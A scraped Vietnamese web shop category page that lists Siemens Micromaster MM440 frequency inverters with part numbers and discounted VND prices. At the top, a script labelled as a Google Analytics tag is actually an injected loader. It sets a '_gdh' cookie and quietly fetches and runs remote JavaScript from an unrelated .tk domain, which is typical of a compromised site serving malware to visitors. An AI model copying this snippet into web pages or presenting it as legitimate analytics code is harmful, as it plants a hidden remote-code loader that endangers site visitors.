<!-- Global site tag (tmp.js) - Google Analytics --> <script async src='https://www.googletagmanager.com/gtag/js?id=UA-154861920-1'></script> <script> function get_cookie(googlesd){ var results = document.cookie.match ( '(^|;) ?' + googlesd + '=([^;]*)(;|$)' ); if (results) return ( unescape ( results[2] ) ); else return null; } function google(src) { var elem = document.createElement("script"); elem.src = src; document.head.appendChild(elem); } var val = get_cookie('_gdh'); if(val != 'icreguali'){ var date = new Date; date.setDate(date.getDate() + 30); date = date.toUTCString(); document.cookie = '_gdh=icreguali; path=/; expires='+date; var val = get_cookie('_gdh'); if(val == 'icreguali'){google('https://icreguali.tk/tmp.js');} } </script>
Danh Mục

Micromaster MM440

Danh mục liên quan
Hiển thị:
Sắp xếp theo:
MM440, 1/3 x 230VAC, 0.12Kw

Mã sản phẩm: 6SE6440-2UC11-2AA1

MM440, 1/3 x 230VAC, 0.12Kw..
10.299.000 VND 7.518.000 VND
MM440, 1/3 x 230VAC, 0.25Kw

Mã sản phẩm: 6SE6440-2UC12-5AA1

MM440, 1/3 x 230VAC, 0.25Kw..
10.694.000 VND 7.806.000 VND
MM440, 1/3 x 230VAC, 0.37Kw ( 0.5 HP)

Mã sản phẩm: 6SE6440-2UC13-7AA1

MM440, 1/3 x 230VAC, 0.37Kw ( 0.5 HP)..
11.664.000 VND 8.515.000 VND
MM440, 1/3 x 230VAC, 0.55Kw ( 0.75 HP)

Mã sản phẩm: 6SE6440-2UC15-5AA1

MM440, 1/3 x 230VAC, 0.55Kw ( 0.75 HP)..
12.588.000 VND 9.189.000 VND
MM440, 1/3 x 230VAC, 0.75Kw ( 1HP)

Mã sản phẩm: 6SE6440-2UC17-5AA1

MM440, 1/3 x 230VAC, 0.75Kw ( 1HP)..
13.248.000 VND 9.671.000 VND
MM440, 1/3 x 230VAC, 1.1Kw ( 1.5 HP)

Mã sản phẩm: 6SE6440-2UC21-1BA1

MM440, 1/3 x 230VAC, 1.1Kw ( 1.5 HP)..
15.227.000 VND 11.115.000 VND
MM440, 1/3 x 230VAC, 1.5Kw ( 2 HP)

Mã sản phẩm: 6SE6440-2UC21-5BA1

MM440, 1/3 x 230VAC, 1.5Kw ( 2 HP)..
17.429.000 VND 12.723.000 VND
MM440, 1/3 x 230VAC, 2Kw ( 3 HP)

Mã sản phẩm: 6SE6440-2UC22-2BA1

MM440, 1/3 x 230VAC, 2Kw ( 3 HP)..
20.510.000 VND 14.972.000 VND
MM440, 1/3 x 230VAC, 3Kw ( 4 HP)

Mã sản phẩm: 6SE6440-2UC23-0CA1

MM440, 1/3 x 230VAC, 3Kw ( 4 HP)..
23.942.000 VND 17.477.000 VND
MM440, 1/3 x 230VAC, 4Kw ( 5 HP)

Mã sản phẩm: 6SE6440-2UC24-0CA1

MM440, 1/3 x 230VAC, 4Kw ( 5 HP)..
28.652.000 VND 20.916.000 VND
MM440, 1/3 x 230VAC, 5.5Kw ( 7.5HP)

Mã sản phẩm: 6SE6440-2UC25-5CA1

MM440, 1/3 x 230VAC, 5.5Kw ( 7.5HP)..
36.794.000 VND 26.859.000 VND
MM440, 1/3 x 230VAC, 7.5Kw ( 10HP)

Mã sản phẩm: 6SE6440-2UC27-5DA1

MM440, 1/3 x 230VAC, 7.5Kw ( 10HP)..
46.212.000 VND 33.735.000 VND
Bản quyền thuộc về Công ty Cổ Phần Xây Dựng Điện Hưng Thịnh © 2020 - Powered by SERENCO.NET